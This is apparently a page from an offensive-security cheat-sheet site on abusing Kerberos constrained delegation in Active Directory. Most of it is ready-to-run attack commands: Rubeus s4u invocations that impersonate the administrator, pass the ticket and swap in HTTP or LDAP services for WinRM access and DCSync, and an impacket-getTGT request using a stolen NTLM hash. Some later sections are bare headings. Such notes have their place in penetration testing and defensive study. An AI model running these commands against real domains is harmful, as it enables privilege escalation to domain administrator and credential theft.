search

Constrained Delegation

Constrained delegation is configured on the computer or user object. It is set through the msds-allowedtodelegateto property by specifying the SPNs the current object is allowed constrained delegation against.

hashtag
Abuse from Windows System

# Rubeus
C:\Tools> Rubeus.exe s4u /ticket:doIE2QuY29ycDEuY29t... /impersonateuser:administrator /msdsspn:mssqlsvc/dc01.vulnableone.local:1433 /ptt

# AltService HTTP - Winrm
C:\Tools> Rubeus.exe s4u /user:appsvc /aes256:$AES256_Keys /impersonateuser:administrator /msdsspn:CIFS/mssql.vulnableone.local /altservice:HTTP /domain:vulnableone.local /ptt

# AltService LDAP - DCSync
C:\Tools> Rubeus.exe s4u /user:appsvc /rc4:$NTLM_Hash /impersonateuser:administrator /domain:vulnableonelocal /msdsspn:nmagent/pp-dc.vulnableone.local /altservice:ldap /dc:pp-dc.vulnableone.local /ptt

hashtag
Abuse from Linux System

hashtag
Requesting TGT

└─$ impacket-getTGT vulnableone.local/svc -hashes :$NTLM_Hash
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Saving ticket in svc.ccache

Exporting Ticket

hashtag
Requesting service ticket and impersonating the administrator user

Export ticket

hashtag
Impacket-mssqlclient

PreviousUnconstrained DelegationNextResource Based Constrained Delegation

Last updated